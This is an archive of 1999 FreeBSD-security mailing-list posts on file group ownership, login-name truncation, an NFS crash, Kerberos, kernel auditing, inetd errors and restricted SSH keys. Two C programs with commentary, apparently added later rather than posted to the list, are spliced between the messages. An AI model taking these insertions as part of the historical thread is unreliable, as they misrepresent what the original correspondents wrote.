In-Reply-To: <4.2.0.32.19990409184654.045424d0@localhost> from "Brett Glass" at "Apr 9, 1999 7:09:23 pm"
To: brett@lariat.org (Brett Glass)
Date: Sat, 10 Apr 1999 02:52:54 -0500 (CDT)
Cc: security@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL43 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Is this so? I was under the impression that the default group of a
> new file was the login group of the creator, as specified in /etc/passwd.

The group by default is the group of the directory. No sgid needs to be set on the directory. I've been using this in FreeBSD for a few years. In System V (Irix) it's different.

Just an idea for secure file transfer: "scp" (ssh) allows you to transfer everything securely. ssh can be used to delete the files.
Igor

From owner-freebsd-security Sat Apr 10 05:56:30 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ppc1.cybertime.ch (ppc1.cybertime.ch [194.191.120.136]) by hub.freebsd.org (Postfix) with ESMTP id 676D914C45 for ; Sat, 10 Apr 1999 05:56:25 -0700 (PDT) (envelope-from pajarola@cybertime.ch)
Received: from tiamat.dlc.cybertime.ch (tiamat.dlc.cybertime.ch [194.191.120.143]) by ppc1.cybertime.ch (8.9.2/8.9.2) with SMTP id OAA60354; Sat, 10 Apr 1999 14:54:01 +0200
Message-Id: <3.0.32.19990410144655.00b84ba0@shrike.overmind.ch>
X-Sender: pajarola@shrike.overmind.ch
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sat, 10 Apr 1999 14:53:50 +0200
To: security@FreeBSD.ORG
From: Rico Pajarola
Subject: Re: FreeBSD 2.2.8 and DES (again)
Cc: Lauro Barbosa
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Tested that on several machines (DES as well as non-DES), 2.2.6, 3.1 and current, and none of them shows this behaviour. Only when the normal username is exactly 8 characters long (or 16 on 3.x and current), it ignores *any* excess characters... eg on current, I have a user called testtesttesttest (16 characters), and I can login as 'testtesttesttest' or as user 'testtesttesttest.' or as user 'testtesttesttestXXXXXXXXXX'.

At least OpenBSD 2.3 and AIX4 do this, too. RH Linux 5.2 and SunOS 5.6 don't (or they have much larger username limits, I don't know).

Rico

>Hello Again!
> Please, I need help.
> I have a server with FreeBSD 2.2.8 and DES installed.
> In this server the users can log in using login_name or
>login_name.
>(with dot at end). for example: john or john.
> Does anybody know this problem?
> How can I correct this?
> Sorry for my poor English.
> Thanks,
> Lauro.
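The symptom Rico describes in the message above (extra characters are ignored only when the stored user name already fills the length limit) is exactly what a fixed-width name comparison produces: with strncmp() over the field width, an 8- or 16-character account name matches any longer input that shares that prefix, while a shorter name still has its terminating NUL compared and so does not. The following is an added example, not code from the thread or from FreeBSD's login(1), that models that weak lookup beside a hardened one which rejects over-long input before comparing. The 16-character limit, the account list and the probe names are constructed for the demonstration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed for the example: a 16-character field, the limit Rico
 * reports for 3.x and -current. No real password file is consulted. */
#define NAME_LIMIT 16

static const char *const users[] = { "root", "testtest", "testtesttesttest" };
#define NUSERS (sizeof users / sizeof users[0])

/* Weak lookup: compares only the first NAME_LIMIT bytes. An entry whose
 * name already fills the field therefore also matches any longer input
 * with that prefix ("testtesttesttest." or "testtesttesttestXXXXXXXXXX").
 * A shorter entry such as "testtest" is unaffected, because its NUL
 * terminator is still inside the compared window. */
static int lookup_prefix(const char *typed)
{
    for (size_t i = 0; i < NUSERS; i++)
        if (strncmp(typed, users[i], NAME_LIMIT) == 0)
            return (int)i;
    return -1;
}

/* Hardened lookup: refuse input longer than the field can hold instead
 * of silently truncating it, then compare the whole string. */
static int lookup_exact(const char *typed)
{
    if (strlen(typed) > NAME_LIMIT)
        return -1;                      /* over-long: reject, never truncate */
    for (size_t i = 0; i < NUSERS; i++)
        if (strcmp(typed, users[i]) == 0)
            return (int)i;
    return -1;
}

/* True when the weak lookup resolves two different strings to one account. */
static bool aliases_collide(const char *a, const char *b)
{
    int ia = lookup_prefix(a), ib = lookup_prefix(b);
    return ia >= 0 && ia == ib && strcmp(a, b) != 0;
}

int main(void)
{
    const char *probes[] = { "testtesttesttest", "testtesttesttest.",
                             "testtesttesttestXXXXXXXXXX", "testtest.", "root." };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%-28s prefix-match=%2d exact-match=%2d\n",
               probes[i], lookup_prefix(probes[i]), lookup_exact(probes[i]));
    return 0;
}
```

Running it shows the weak lookup mapping all three 16-character-prefixed probes to the same account while "testtest." and "root." fail, which is the pattern Rico observed; the exact lookup accepts only the unmodified name.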
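Brett says in the chowning-files thread above that he will have to test the directory-group behaviour rather than trust the man page, and the replies describe two rules: the BSD one (a new file takes its directory's group, no setgid needed), which Kenneth, Wes, Steinar and Igor report, and the SysV one (the creating process's effective gid unless the directory is setgid), which Steinar and Cy describe. The program below is an added example, not from the list or from any of these systems, that performs Brett's test empirically on whatever host it runs on: it creates a scratch directory, hands it to a supplementary group of the process other than its effective gid, creates a file and reports which rule applied, then repeats the check with S_ISGID set. If the process has no second group to use, it reports "undetermined" instead of guessing. The /tmp location, the 64-group buffer and the output labels are this example's own choices.

```c
#define _XOPEN_SOURCE 700
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pick a supplementary group different from the effective gid, or (gid_t)-1. */
static gid_t alternate_group(void)
{
    gid_t groups[64];                      /* constructed upper bound for the probe */
    int n = getgroups(64, groups);
    gid_t egid = getegid();
    for (int i = 0; i < n; i++)
        if (groups[i] != egid)
            return groups[i];
    return (gid_t)-1;
}

/* Create and remove a file in dir; return the group it was created with. */
static gid_t gid_of_new_file(const char *dir, const char *name)
{
    char path[512];
    struct stat st;
    snprintf(path, sizeof path, "%s/%s", dir, name);
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return (gid_t)-1;
    int rc = fstat(fd, &st);
    close(fd);
    unlink(path);
    return rc == 0 ? st.st_gid : (gid_t)-1;
}

/* Classify how a new file's group is chosen in dir, whose group is dir_gid:
 * "bsd"   = inherits the directory's group,
 * "sysv"  = takes the process's effective gid,
 * "other" = neither, "error" = the file could not be created. */
static const char *classify(const char *dir, gid_t dir_gid)
{
    gid_t g = gid_of_new_file(dir, "probe");
    if (g == (gid_t)-1) return "error";
    if (g == dir_gid)   return "bsd";
    if (g == getegid()) return "sysv";
    return "other";
}

/* Run the probe on a plain directory and again with S_ISGID set.
 * Writes e.g. "plain=bsd setgid=bsd" into out and returns 0; returns -1
 * and writes "undetermined" or "error" when the test could not be run. */
int probe_group_inheritance(char *out, size_t outlen)
{
    gid_t alt = alternate_group();
    if (alt == (gid_t)-1) {
        snprintf(out, outlen, "undetermined");
        return -1;
    }
    char tmpl[] = "/tmp/gidprobe.XXXXXX";
    char *dir = mkdtemp(tmpl);
    if (dir == NULL || chown(dir, (uid_t)-1, alt) != 0) {
        if (dir != NULL) rmdir(dir);
        snprintf(out, outlen, "error");
        return -1;
    }
    const char *plain = classify(dir, alt);
    chmod(dir, 0700 | S_ISGID);            /* now exercise the SysV-style switch */
    const char *sgid = classify(dir, alt);
    snprintf(out, outlen, "plain=%s setgid=%s", plain, sgid);
    rmdir(dir);
    return 0;
}

int main(void)
{
    char report[64];
    probe_group_inheritance(report, sizeof report);
    puts(report);   /* expect "plain=bsd setgid=bsd" on FreeBSD, "plain=sysv setgid=bsd" on Linux */
    return 0;
}
```

On FreeBSD both halves should report "bsd", confirming Igor's point that no sgid bit is needed there; on a SysV-style system, and on Linux with default mount options, the plain directory reports "sysv" and only the setgid directory reports "bsd", which is the switch Steinar and Cy describe. The user running it must belong to at least two groups, or the result is "undetermined".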
From owner-freebsd-security Sat Apr 10 13:10:04 1999
Delivered-To: freebsd-security@freebsd.org
Received: from posgate.acis.com.au (posgate.acis.com.au [203.14.230.14]) by hub.freebsd.org (Postfix) with ESMTP id D51A515313 for ; Sat, 10 Apr 1999 13:09:47 -0700 (PDT) (envelope-from andymac@bullseye.apana.org.au)
Received: from bullseye.apana.org.au (uucp@localhost) by posgate.acis.com.au (8.9.2/8.9.2/Debian/GNU) with UUCP id GAA25216; Sun, 11 Apr 1999 06:02:04 +1000 (EST)
Received: from bullseye.apana.org.au (central.apana.org.au [203.9.107.245]) by bullseye.apana.org.au (8.8.8/8.8.8) with SMTP id TAA03022; Sat, 10 Apr 1999 19:10:14 +1000 (EST) (envelope-from andymac@bullseye.apana.org.au)
Date: Sat, 10 Apr 1999 19:06:26 +1000 (EST)
From: Andrew MacIntyre
To: Brett Glass
Cc: Wes Peters , security@FreeBSD.ORG
Subject: Re: Interesting problem: chowning files sent via FTP
In-Reply-To: <4.2.0.32.19990409223443.0451c100@localhost>
Message-ID:
X-X-Sender: andymac@bullseye.apana.org.au
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 9 Apr 1999, Brett Glass wrote:

> Y'know, it'd be really nice if NFS had "accounts" and "passwords" per se,
> but as far as I know the only version that had anything like this was a
> proposed "standard" for file transfers that went nowhere. (What was
> the name again? I forget.)

Would samba provide access authentication closer to the model you desire? IIRC, the client end is "sharity light".

-- 
Andrew I MacIntyre                     "These thoughts are mine alone..."
E-mail: andrew.macintyre@aba.gov.au  (work) | Snail: PO Box 370
        andymac@bullseye.apana.org.au (play) |        Belconnen ACT 2616
Fido:   Andrew MacIntyre, 3:620/243.18       |        Australia

From owner-freebsd-security Sat Apr 10 14:07:38 1999
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 94DEE14C94 for ; Sat, 10 Apr 1999 14:07:36 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id OAA11768; Sat, 10 Apr 1999 14:07:45 -0700
Received: from da006.inetex.com(139.142.118.21), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda11766; Sat Apr 10 14:07:32 1999
Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id NAA45990; Sat, 10 Apr 1999 13:34:32 -0700 (PDT)
Message-Id: <199904102034.NAA45990@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdq45986; Sat Apr 10 13:34:30 1999
X-Mailer: exmh version 2.0.2 2/24/98
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 2.2.8-RELEASE
X-Sender: cy
To: sthaug@nethelp.no
Cc: brett@lariat.org, ingham@i-pi.com, security@FreeBSD.ORG
Subject: Re: Interesting problem: chowning files sent via FTP
In-reply-to: Your message of "Sat, 10 Apr 1999 09:17:08 +0200." <31184.923728628@verdi.nethelp.no>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Sat, 10 Apr 1999 13:34:30 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <31184.923728628@verdi.nethelp.no>, sthaug@nethelp.no writes:
> > Is this so? I was under the impression that the default group of a
> > new file was the login group of the creator, as specified in /etc/passwd.
> 
> AFAIK, in all BSD versions the default group of a new file is the group
> of the directory it is created in.
> 
> > As for the setgid-on-execution bit: there's no documentation on what it
> > does when set on a directory. The chmod(1) man page doesn't say anything.
> > Does it change the group ownership of newly created files?
> 
> setgid on a directory is a SYSV-ism (or rather, close to a SVR4-ism). It
> means that the SYSV system in question should follow the BSD semantics
> for files created in this directory, instead of the default SYSV semantics
> (set the group of the file to the effective gid of the creating process).

The SVR4-ism is there because SYSV does not conform to FIPS-151. FIPS-151 states BSD semantics must be used for newly created files and directories. FIPS-151 is a US Government standard; if a vendor does not adhere to it, that vendor's system cannot be purchased by agencies of the US government. That's why SVR4 uses the sgid bit for directories, to conform to FIPS-151. It's all described in Stevens' book on Advanced UNIX Programming.

> 
> setgid on a directory works this way at least in Solaris 2 and HP-UX 10.x/
> 11.x.
Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Open Systems Group             Internet:  Cy.Schubert@uumail.gov.bc.ca
ITSD                                      Cy.Schubert@gems8.gov.bc.ca
Province of BC
"e**(i*pi)+1=0"

From owner-freebsd-security Sun Apr 11 00:06:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id DE1E714F4A; Sun, 11 Apr 1999 00:06:14 -0700 (PDT) (envelope-from dillon@apollo.backplane.com)
Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id AAA03493; Sun, 11 Apr 1999 00:03:49 -0700 (PDT) (envelope-from dillon)
Date: Sun, 11 Apr 1999 00:03:49 -0700 (PDT)
From: Matthew Dillon
Message-Id: <199904110703.AAA03493@apollo.backplane.com>
To: "David E. Cross"
Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: increased crashing in NFS server
References: <199904110341.XAA17071@cs.rpi.edu>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

:I recently updated all of our FreeBSD3 clients to use NFSv3/UDP when
:contacting our servers (FreeBSD3 of the same build tree). We have
:noticed an increase in crashing of our main home directory server
:(which is the only server really handling RW mounts, our other servers
:are mostly RO, with some minor RW activity.) The first crash was
:obviously NFS. I traced it to one of 2 possible crash points in the
:kernel (sorry, no stack trace, we don't [yet] have a crashlogs enabled
:for that machine.).
:
:The panic was:
:mbuf siz=33476
:panic: Bad nfs svc reply

You are using a 32K file block size? If so, reduce it to 8K.

I think you've just shown us a security hole in the NFS system -- it panics if it is given too large a response packet. Oops. It should just print a message and drop the packet.

:The second panic just happened, it claims to be softupdate related.
:I
:think it may have something to do with NFSv3 however since this machine
:used to be very stable (ie, not 2 crashes in a week).
:
:This panic was:
:panic: softdep_write_inodeblock: indirect pointer #0 mismatch 0 != 102192
:8
:syncing disks... panic: softdep_lock: locking against myself
:...
: The Regents of the University of California. All rights reserved.
:FreeBSD 3.1-STABLE #0: Sun Mar 21 02:23:19 EST 1999
: schimken@wobble.cs.rpi.edu:/usr/src/sys/compile/STAGGER
:...
:David Cross | WinNT:Linux::Linux:FreeBSD

This is when you built it. When did you check the source out of the CVS tree?

There have been a few commits in this area since Mar 21st, you definitely want to update your sources, but I don't think any of the commits address the above softupdates panic. I've never seen that panic before.

I recommend fsck'ing all your filesystems from single-user just in case there's some garbage in there.

-Matt
Matthew Dillon

From owner-freebsd-security Sun Apr 11 16:02:51 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 8E05117936; Sun, 11 Apr 1999 15:51:26 -0700 (PDT) (envelope-from mark@greenpeace.grondar.za)
Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.2/8.9.2) with ESMTP id NAA01660; Sun, 11 Apr 1999 13:44:43 +0200 (SAST) (envelope-from mark@greenpeace.grondar.za)
Received: from greenpeace.grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id NAA73219; Sun, 11 Apr 1999 13:44:00 +0200 (SAST) (envelope-from mark@greenpeace.grondar.za)
Message-Id: <199904111144.NAA73219@greenpeace.grondar.za>
To: Matthew Dillon
Cc: Robert Watson , Eivind Eklund , Sheldon Hearn , Mike Thompson , Gary Gaskell , freebsd-security@freebsd.org
Subject: Re: Kerberos vs SSH
In-Reply-To: Your message of " Thu, 25 Mar 1999 10:38:41 PST." <199903251838.KAA01021@apollo.backplane.com>
References: <199903251838.KAA01021@apollo.backplane.com>
Date: Sun, 11 Apr 1999 13:43:45 +0200
From: Mark Murray
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Matthew Dillon wrote:
> :Any chance of K5 becoming the default version of kerberos distributed with
> :FreeBSD sometime? :-)
> :
> : Robert N Watson
> 
> I would second this request. We've been using KRB5 for almost a year now

I have it commit ready - waiting for PAM to mature and also watching Heimdal's progress.

Reading this list after a long layoff :-)

M
-- 
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Sun Apr 11 16:29:38 1999
Delivered-To: freebsd-security@freebsd.org
Received: from cs.rpi.edu (mumble.cs.rpi.edu [128.213.8.16]) by hub.freebsd.org (Postfix) with ESMTP id 4BA0015C37; Sun, 11 Apr 1999 16:06:51 -0700 (PDT) (envelope-from crossd@cs.rpi.edu)
Received: from cs.rpi.edu (monica.cs.rpi.edu [128.213.7.2]) by cs.rpi.edu (8.9.1/8.9.1) with ESMTP id MAA24421; Sun, 11 Apr 1999 12:00:09 -0400 (EDT)
Message-Id: <199904111600.MAA24421@cs.rpi.edu>
To: Matthew Dillon
Cc: "David E. Cross" , freebsd-hackers@freebsd.org, freebsd-security@freebsd.org, schimken@cs.rpi.edu
Subject: Re: increased crashing in NFS server
In-Reply-To: Message from Matthew Dillon of "Sun, 11 Apr 1999 00:03:49 PDT." <199904110703.AAA03493@apollo.backplane.com>
Date: Sun, 11 Apr 1999 12:00:04 -0400
From: "David E. Cross"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> :I recently updated all of our FreeBSD3 clients to use NFSv3/UDP when
> :contacting our servers (FreeBSD3 of the same build tree).
> :We have
> :noticed an increase in crashing of our main home directory server
> :(which is the only server really handling RW mounts, our other servers
> :are mostly RO, with some minor RW activity.) The first crash was
> :obviously NFS. I traced it to one of 2 possible crash points in the
> :kernel (sorry, no stack trace, we don't [yet] have a crashlogs enabled
> :for that machine.).
> :
> :The panic was:
> :mbuf siz=33476
> :panic: Bad nfs svc reply
> 
> You are using a 32K file block size? If so, reduce it to 8K.
> 
> I think you've just shown us a security hole in the NFS system -- it
> panics if it is given too large a response packet. Oops. It should
> just print a message and drop the packet.

We are using AMD, so I have no idea what size it is using. I will again say that it would be really nice to be able to query the full mount options. I have tried statfs(2), but it does not seem to have what I want. I will tell amd to use rsize/wsize of 8192 to force the issue. It is becoming slightly annoying that amd would default to unstable options ;)

> :The second panic just happened, it claims to be softupdate related. I
> :think it may have something to do with NFSv3 however since this machine
> :used to be very stable (ie, not 2 crashes in a week).
> :
> :This panic was:
> :panic: softdep_write_inodeblock: indirect pointer #0 mismatch 0 != 102192
> :8
> :syncing disks... panic: softdep_lock: locking against myself
> :...
> : The Regents of the University of California. All rights reserved.
> :FreeBSD 3.1-STABLE #0: Sun Mar 21 02:23:19 EST 1999
> : schimken@wobble.cs.rpi.edu:/usr/src/sys/compile/STAGGER
> :...
> 
> This is when you built it. When did you check the source out of the CVS
> tree?
> 
> There have been a few commits in this area since Mar 21st, you definitely
> want to update your sources, but I don't think any of the commits address
> the above softupdates panic. I've never seen that panic before.
> 
> I recommend fsck'ing all your filesystems from single-user just in case
> there's some garbage in there.

Ok, we will do all of that when we can schedule a convenient downtime. The sources were checked out around noon, Fri, Mar 26. Is it possibly a NFS3/Softupdates problem? All the exported filesystems on that drive are softupdate mounted, and the only access to that filesystem is via NFS.

-- 
David Cross                               | WinNT:Linux::Linux:FreeBSD
Systems Administrator/Research Programmer | Rensselaer Polytechnic Institute,
                                          | This space intentionally
Department of Computer Science            | left unblank
I speak only for myself.                  |

From owner-freebsd-security Sun Apr 11 16:29:37 1999
Delivered-To: freebsd-security@freebsd.org
Received: from cs.rpi.edu (mumble.cs.rpi.edu [128.213.8.16]) by hub.freebsd.org (Postfix) with ESMTP id 374AC15612; Sun, 11 Apr 1999 16:06:51 -0700 (PDT) (envelope-from crossd@cs.rpi.edu)
Received: from cs.rpi.edu (monica.cs.rpi.edu [128.213.7.2]) by cs.rpi.edu (8.9.1/8.9.1) with ESMTP id NAA25039; Sun, 11 Apr 1999 13:10:30 -0400 (EDT)
Message-Id: <199904111710.NAA25039@cs.rpi.edu>
To: freebsd-hackers@freebsd.org
Cc: crossd@cs.rpi.edu, freebsd-security@freebsd.org, schimken@cs.rpi.edu
Subject: Re: increased crashing in NFS server
In-Reply-To: Message from Matthew Dillon of "Sun, 11 Apr 1999 00:03:49 PDT." <199904110703.AAA03493@apollo.backplane.com>
Date: Sun, 11 Apr 1999 13:10:30 -0400
From: "David E. Cross"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> : The Regents of the University of California. All rights reserved.
> :FreeBSD 3.1-STABLE #0: Sun Mar 21 02:23:19 EST 1999
> : schimken@wobble.cs.rpi.edu:/usr/src/sys/compile/STAGGER
> :...
> :David Cross | WinNT:Linux::Linux:FreeBSD
> 
> This is when you built it. When did you check the source out of the CVS
> tree?

As was pointed out to me (and sent to Matt).
A checkout on the 26th would not have been possible. It was checked out on the previous Friday, the 19th.

--
David Cross                               | WinNT:Linux::Linux:FreeBSD
Systems Administrator/Research Programmer | Rensselaer Polytechnic Institute,
                                          | This space intentionally
Department of Computer Science            | left unblank
I speak only for myself.                  |

From owner-freebsd-security Sun Apr 11 18:41:41 1999
Message-ID: <37114F00.4746742C@tdnet.com.br>
Date: Sun, 11 Apr 1999 22:40:16 -0300
From: User Grios
To: freebsd-security@freebsd.org
Subject: list security

I have a very simple question:

How can I limit user posts to a mailing list, for instance: only user xxxx@secure.host from IP ADDRESS aaa.bbb.ccc.ddd can post messages to the list!

Is that possible?

My mail server is qmail and my list manager is EZMLM!

Thank you for your time and cooperation.
PS: here goes my uname -a output (/etc/motd asked me to send this info):

FreeBSD etosha 2.2.8-STABLE FreeBSD 2.2.8-STABLE #0: Tue Apr 6 23:34:08 EST 1999 toor@etosha:/usr/src/sys/compile/ETOSHA i386

From owner-freebsd-security Sun Apr 11 18:52:02 1999
Message-ID: <19990411214938.A18980@palomine.net>
Date: Sun, 11 Apr 1999 21:49:38 -0400
From: Chris Johnson
To: User Grios
Cc: freebsd-security@freebsd.org
Subject: Re: list security
References: <37114F00.4746742C@tdnet.com.br>
In-Reply-To: <37114F00.4746742C@tdnet.com.br>; from User Grios on Sun, Apr 11, 1999 at 10:40:16PM -0300

On Sun, Apr 11, 1999 at 10:40:16PM -0300, User Grios wrote:
> I have a very simple question:
> How can I limit user posts to a mailing list, for instance: only user xxxx@secure.host from IP ADDRESS aaa.bbb.ccc.ddd can post messages to the list!
>
> Is that possible?
>
> My mail server is qmail and my list manager is EZMLM!

It's probably possible, if you want to hack the code. You'll probably have better luck with this question on the ezmlm mailing list: ezmlm@list.cr.yp.to.
Chris

From owner-freebsd-security Mon Apr 12 05:47:33 1999
Message-ID: <386.923562532@critter.freebsd.dk>
Date: Thu, 08 Apr 1999 11:08:52 +0200
From: Poul-Henning Kamp
To: Robert Watson
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: POSIX.1E auditing support, an initial pass and some questions
In-reply-to: Your message of "Mon, 05 Apr 1999 13:56:41 EDT."

Hi Robert,

It sounds to me like you will be overlapping with KTRACE to a great extent, have you considered unification of the two? Certainly your stuff can do anything that KTRACE can, so if anything we should be able to get rid of KTRACE if we adopt your stuff. There is also some overlap with process-accounting come to think of it.

There is no easy way to get all args to all syscalls, they're too unsystematic for that.

Have you considered doing (some of) the filtering in the kernel in a manner like bpf? This would reduce the performance impact.

I would also love to have a remote audit ability where the audit records are never passed into userland on the audited machine, but instead shipped over a network (or other interface) to a monitor box.

Keep at it!
--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Mon Apr 12 06:45:42 1999
Date: Mon, 12 Apr 1999 09:39:31 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Poul-Henning Kamp
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: POSIX.1E auditing support, an initial pass and some questions
In-Reply-To: <386.923562532@critter.freebsd.dk>

On Thu, 8 Apr 1999, Poul-Henning Kamp wrote:

> It sounds to me like you will be overlapping with KTRACE to a great extent, have you considered unification of the two? Certainly your stuff can do anything that KTRACE can, so if anything we should be able to get rid of KTRACE if we adopt your stuff. There is also some overlap with process-accounting come to think of it.

I thought about this briefly, and later received email from Nate on the same topic. I agree that, if possible, we should have one mechanism for generating traces, optionally formatted as audit records. The audit mechanism doesn't trace things like signals or care about a number of other events.
My temptation would be to go for a modified KTRACE as it's already in place and (presumably) moderately efficient, and then have a funneling module that converts the KTRACE data into an audit record format, or more extensive process trace format. The auditing data defined by POSIX.1e is limited to user-requests that the POSIX folk considered to be relevant--i.e., brk()/sbrk() aren't there, but open() is. They allow for local extension as needed, but holding to their philosophy is probably useful. Also, defining a set which is useful for other camps (*BSD, linux, etc) is probably a good idea so portability can be maximized.

> There is no easy way to get all args to all syscalls, they're too unsystematic for that.

I had suspected (and observed) as much. What is the rationale behind having the name lookup pull the pathname into the kernel as opposed to using a copyin in the syscall and passing it in as an argument? Presumably someone, somewhere has to allocate space on the stack, and if it's done in the syscall function then more argument processing is done in one place? This would make at least a bit more available to an auditing layer in the syscall.

> Have you considered doing (some of) the filtering in the kernel in a manner like bpf? This would reduce the performance impact.

Yes. Once the kernel interface issue was sorted out, I had plans for at least a rudimentary mask functionality, although having something stronger (ie, bpf) would certainly be better. The mask I had in mind was something on the order of a set of processes interesting to an audit record customer, and then a mask of event types (mappable fairly directly to syscalls, etc). Right now I have it configured so there is only one consumer sitting on a queue attached to /dev/audit. My intent there was to have auditd process as necessary, and then provide records to other consumers by way of IPC or dynamic linking of IDS modules into auditd and a standard access API.
> I would also love to have a remote audit ability where the audit records are never passed into userland on the audited machine, but instead shipped over a network (or other interface) to a monitor box.

That would certainly be possible, and would definitely be useful :-). I didn't have plans for this in the pipeline, but that could be a great feature. Of course, the pipeline trails off a little at this point because of the "integrate into the kernel" issue :-). Presumably one could optionally also throw in the use of a one-way hash for speedy authentication by shared secret. I would think putting public key support in would belong in a user-land daemon until the kernel is preemptible, and also be batched.

I'm not sure if you've had a chance to look at the POSIX.1e draft or my man pages for it. The man pages are online on my POSIX.1e page as part of the tarball containing the first pass. The API is completely documented, but I still have to document the audit event types and what they expect to be reported.

  Robert N Watson
  robert@fledge.watson.org              http://www.watson.org/~robert/
  PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C
  Carnegie Mellon University            http://www.cmu.edu/
  TIS Labs at Network Associates, Inc.
  http://www.tis.com/
  Safeport Network Services             http://www.safeport.com/

From owner-freebsd-security Mon Apr 12 08:18:45 1999
Message-ID: <37120E9B.1AE1FD8D@ukonline.net>
Date: Mon, 12 Apr 1999 16:17:47 +0100
From: Max Booth
Organization: UK Online Ltd
To: freebsd-security@freebsd.org
Subject: inetd problems

Hi all,

Recently, since the load on one of our FreeBSD 3.0 systems has been increasing I keep on getting the following errors when attempting connections to the system:

Escape character is '^]'.
inetd in realloc(): warning: junk pointer, too low to make sense.
inetd in free(): warning: junk pointer, too low to make sense.
Connection closed by foreign host.

The only thing using inetd now is telnetd, so I can't imagine that it's due to inetd being under too much pressure.

Has anyone else experienced this problem?

Thanks in advance, apologies if this is the wrong list.
Regards,

max

--
Max Booth
Systems Developer for UK Online Ltd
http://www.ukonline.co.uk/
Email: max@ukonline.net
"Believing oneself to be perfect is often the sign of a delusional mind"

From owner-freebsd-security Mon Apr 12 08:50:02 1999
Message-ID: <19990412104729.A62365@dazed.slacker.com>
Date: Mon, 12 Apr 1999 10:47:29 -0500
From: David McNett
To: freebsd-security@freebsd.org
Subject: Re: ssh and scp
References: <199904080936.TAA11475@atdot.dotat.org>
In-Reply-To: ; from Bruce Campbell on Fri, Apr 09, 1999 at 10:26:24AM +1000

On 09-Apr-1999, Bruce Campbell wrote:
> Works for me, although I'll admit to being a bit shy of null-password RSA keys, which can be alleviated somewhat by restricting which hosts can use which keys.

Actually the level of restriction can be much more granular than simply permitting and denying on a host-by-host basis. The sshd manpage has considerable detail on this under the subheading AUTHORIZED_KEYS FILE FORMAT. In addition to specifying valid remote hosts on a key basis, one can also restrict a keypair to a single command with the "command=" directive. In this way you can prohibit the null-passphrase RSA key to a single task and not worry about an open shell if the keypair is compromised.
While any null-passphrase situation is by definition an open door, you can at least limit the scope of the activity that compromise permits.

from="trust.slacker.com" no-pty no-agent-forwarding no-X11-forwarding no-port-forwarding command="/home/luser/bin/only_this_command" 1024 35
1385747740706965662979092265453243173821775069593500592656102528164588
1458968562818828612328348480183921191882598263470247545000152074356254
7885213846674971276953111134546999143676911041828605560207201262339416
9160927998516632223127781986085086932733750776793503721007278947326141
39818692207780079452547982359 null passphrase key

From owner-freebsd-security Mon Apr 12 09:15:02 1999
Message-Id: <199904121612.MAA01726@eagle.aitken.com>
Date: Mon, 12 Apr 1999 12:12:36 -0400 (EDT)
From: Jeff Aitken
To: max@ukonline.net (Max Booth)
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: inetd problems
In-Reply-To: <37120E9B.1AE1FD8D@ukonline.net> from Max Booth at "Apr 12, 1999 04:17:47 pm"

Max Booth writes:
> Escape character is '^]'.
> inetd in realloc(): warning: junk pointer, too low to make sense.
> inetd in free(): warning: junk pointer, too low to make sense.
> Connection closed by foreign host.

